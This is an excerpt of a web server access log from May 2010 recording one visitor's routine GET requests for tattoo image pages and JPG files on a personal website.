68.149.84.28 - - [03/May/2010:21:47:28 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:47:28 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:47:58 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:47:59 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:47:59 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:47:59 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:47:59 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.149.84.28 - - [03/May/2010:21:47:59 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
